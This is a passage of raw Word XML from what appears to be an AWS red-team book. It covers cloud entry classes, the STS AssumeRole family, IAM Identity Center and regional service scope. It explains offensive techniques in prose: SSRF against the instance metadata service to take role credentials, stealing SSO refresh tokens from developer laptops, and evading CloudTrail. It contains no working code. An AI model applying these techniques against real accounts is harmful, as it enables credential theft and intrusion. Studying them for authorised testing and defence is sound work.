        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>For every finding the red team files, ask two questions: (1) What is the IAM control that should have prevented this? (2) What is the detection that should have alerted on it in under an hour? If either answer is "we don't have one," that is a higher-severity finding than whatever technical exploit triggered it. The goal of Part I is to give you the framework to ask those two questions in every chapter that follows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7719772E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FE222A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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shared-responsibility line is an attack map, not a disclaimer. Know which layers are in scope and get it in writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7161DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Control-plane attacks are loud; data-plane attacks are quiet. OPSEC follows that asymmetry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC4A630" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Blast radius scales from resource through service, region, account, organization, and partition. Frame findings at the radius they actually reach.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39287B25" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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AWS attack lifecycle is seven phases; the rest of this book elaborates each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61091002" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Regulatory context changes severity, not just remediation. Read the engagement letter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B80733" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="361051077"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F90DA3"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The AWS Attack Surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D0573" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:spacing w:before="240" w:after="48"/>
        <w:outlineLvl w:val="4"/>
        <w:divId w:val="879703825"/>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7316E172" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:after="240"/>
        <w:divId w:val="879703825"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate the five classes of entry into AWS environments, the STS trust primitives adversaries target, and the regional vs. global service footprint that defines where an operator must hunt. Introduce the STS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> family decision tree that drives Chapters 7 and 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD3B5FE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="lead"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>The AWS attack surface is not the sum of the service APIs — it is the set of identity primitives, configuration defaults, and trust relationships that a principal needs to cross to go from outside the account to in it. Five entry classes cover virtually every AWS compromise of the last decade. The rest of the book is deeper exploration of each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F9BA8D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2.1  The five entry classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12766E9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An operator should be able to recite these five in their sleep, because scoping conversations, attack-path diagrams, and executive summaries all fall back to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647C851E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Leaked credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access keys in public GitHub, in Docker image layers on Docker Hub, in CI build logs, in mobile application binaries, in Terraform state files, in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aws-vault</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>saml2aws</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> caches on a developer's laptop. The most common AWS compromise vector and the most-exploited primitive in this book.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BC4F0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Exposed services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Public S3 buckets with sensitive objects, public RDS snapshots, public AMIs with baked-in credentials, public EBS snapshots, Lambda function URLs exposed to the internet, API Gateway endpoints with broken authorizers, Elasticsearch/OpenSearch domains with open access policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EFA64" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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SSRF / metadata abuse.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Server-side request forgery in a web application running on EC2 reaches the Instance Metadata Service (IMDS) and exfiltrates the attached instance-profile role's session credentials. Still the single most productive cloud-native vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06288195" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Supply chain.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CI/CD pipelines with OIDC trust into AWS, malicious GitHub Actions, poisoned Lambda layers, compromised npm/pip packages in a deploy pipeline, third-party SaaS integrations with stored AWS credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFFEDE5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Identity federation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Compromise of the identity provider (Okta, Entra/Azure AD, Google Workspace) or the SAML/OIDC trust relationship feeds an attacker into the AWS console as a legitimate federated user, skipping credential theft entirely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27564FF2"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1. Leaked credential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git, Docker, CI logs, mobile app</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2. Exposed service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public S3, RDS snaps, Lambda URL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3. SSRF / IMDS abus</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web app SSRF → 169.254.169.25</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>4</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4. Supply chai</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GH Actions OIDC, Lambda layer</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5. Identity federatio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IdP compromise, SAML/OIDC abus</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AssumeRole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user / role sessio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bread-and-butter: CloudFox, Pac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>u</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 ECS / Lambda exec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workload identity in comput</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Cross-account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vendor, audit, third-party trus</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Identity Center sessio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federated console / CLI use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 master / billing roo</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full blast radiu</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The five entry classes all funnel through STS to issue a session. If you cannot shape an STS call, you do not have a foothold</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Entry-class taxonomy. Every AWS compromise ultimately issues an STS session for the target principal. The art of Part II is in getting a first session; the art of Part III is in widening it</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3545C404" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2  STS and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> family</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507DA3C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STS — the Security Token Service — is the credential-issuing authority of AWS. Every federated login, every cross-account call, every EC2 instance-profile reuse, and every IAM role assumption ultimately lands in an STS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> API call. Understanding the family tree is the single most useful identity-plane knowledge for a cloud operator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F009FFE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — the vanilla cross-account-or-same-account role assumption. Caller presents their current credentials; the target role's trust policy decides. Output: 15-minute to 12-hour session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5606D4E6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRoleWithSAML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SAML-federated entry point from an external IdP (Okta, ADFS). The target role's trust policy includes a SAML provider ARN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F225EAF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRoleWithWebIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — OIDC-federated. GitHub Actions, GitLab, IRSA in EKS, Google OIDC — all land here. The trust policy references an OIDC provider and conditions on the token's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>aud</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44974554" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:GetFederationToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — legacy, less common; an IAM user mints a short-lived session derivative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B749D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:GetSessionToken</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — MFA-qualified session extension for an IAM user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC5A7B7" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="36" w:after="36"/>
        <w:ind w:left="1008"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:GetCallerIdentity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — reflection; returns the caller's principal ARN without requiring any permissions at all. First call in every compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFFAE9"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Do you already hol</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 credentials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user / role session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(long-term or IMDS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Have you compromise</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an IdP or OIDC issuer</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sts:AssumeRol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same / cross acc</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sts:GetSessionToke</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MFA extensio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sts:AssumeRoleWit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>h</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SAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>L</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sts:AssumeRoleWit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>h</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WebIdentit</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user + access ke</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developer, CI secre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IMDSv2 / IRS</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workload identit</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Okta / Entra I</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console SS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>O</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GitHub Actions OID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>C</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CI pipelin</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sts:GetCallerIdentity — always firs</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n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ye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STS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AssumeRole*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> decision tree. Every lateral-movement step in AWS ultimately reaches one of the four leaves. Identify which branch your foothold lives on and you have identified your attack path</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680997E8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2.3  IAM Identity Center (née AWS SSO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5315824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IAM Identity Center has quietly become the default federated-login pattern for enterprises since 2021, replacing the older "connect Okta to each account's SAML" approach. From an attacker's perspective IAM Identity Center is important because a compromised Identity Center user gets short-lived role sessions into any account in the organization they have a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>permission set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> assignment for. There is no long-term access key to steal; instead, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~/.aws/sso/cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder on a developer's laptop contains a refresh token. Steal that and you walk into every account in scope as the developer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B331C27" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>2.4  Regional vs. global service footprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CBFFD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Most AWS services are regional; a handful are global. This matters for recon (you must sweep every region) and for defense evasion (CloudTrail must be configured as a multi-region trail to see global-service events).</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1890"/>
        <w:gridCol w:w="3111"/>
        <w:gridCol w:w="4359"/>
      </w:tblGrid>
      <w:tr w:rsidR="00000000" w14:paraId="5CA12CF8" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
